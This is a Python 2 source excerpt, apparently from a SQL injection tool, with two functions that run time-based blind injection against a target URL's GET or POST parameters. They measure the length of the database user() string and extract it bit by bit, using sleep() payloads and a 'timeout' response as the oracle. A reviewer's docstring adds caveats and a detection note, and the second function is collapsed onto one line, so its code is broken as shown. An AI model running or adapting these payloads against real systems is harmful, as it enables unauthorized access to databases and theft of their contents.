def getlen(url,data=None,para=None):
    """Probe, by time-based blind injection, the length of the database ``user()`` string.

    Args:
        url: target URL; when ``data`` is None the probe is appended to it (GET form).
        data: request-body dict for the POST form, or None for the GET form.
        para: key in ``data`` whose value receives the probe (POST form only).

    Returns:
        The first ``i`` (counting from 0) whose probe produced a response body
        containing the string ``"timeout"``.

    Notes (review):
        - The loop has no upper bound: if no response ever contains ``"timeout"``
          (target not vulnerable, request errors, a different timeout marker),
          this function never returns.
        - ``httpres()`` and ``format()`` are defined elsewhere in this file;
          from their use here they appear to return the response body as text
          and a mutable copy of ``data`` respectively -- TODO confirm.
          ``format`` shadows the builtin of the same name.
        - Detection note: the distinctive request-side artefact is the
          ``sleep(if(length((select user()))=N,1,0))`` fragment paired with a
          trailing comment terminator; the only oracle is a response that
          crosses the HTTP client's timeout.
    """
    i=0
    if data==None:  # `is None` would be the idiomatic comparison
        # GET form: probe is appended to the URL already URL-encoded
        # (%20 = space, %23 = `#`).
        while True:
            print "[+] Checking: %s " %i
            payload = url+"'+or+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23"
            #print payload
            html=httpres(payload)
            flag="timeout"  # presence of this marker in the body is the only signal used
            if flag in html:
                print u"长度为:%s"%i  # message text: "length is: %s"
                return i
            i+=1
    else:
        # POST form: the same probe, unencoded, is concatenated onto the
        # `para` field and the whole dict is then form-encoded.
        while True:
            print "[+] Checking: %s " %i
            a=format(data)
            a[para]=a[para]+"'or sleep(if(length((select user()))="+str(i)+",1,0))#"
            post_data = urllib.urlencode(a)
            #print payload
            html=httpres(url,post_data)
            flag="timeout"  # same oracle as the GET form
            if flag in html:
                print u"长度为:%s"%i  # message text: "length is: %s"
                return i
            i+=1
def run(self): global res #用来存二进制 url=self.url j=self.str x=self.x para=self.para data=self.data if data==None: payload = url+"'or+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html=httpres(payload) flag="timeout" if flag in html: res[str(j)] = 1 else: res[str(j)] = 0 else: a=format(data) a[para]=a[para]+"'or if(1=(mid(lpad(bin(ord(mid((select user())," + str(x) + ",1))),8,0),"+ str(j) + ",1)),sleep(2),0)#" post_data = urllib.urlencode(a) html=httpres(url,post_data) flag="timeout" if flag in html: res[str(j)] = 1 else: res[str(j)] = 0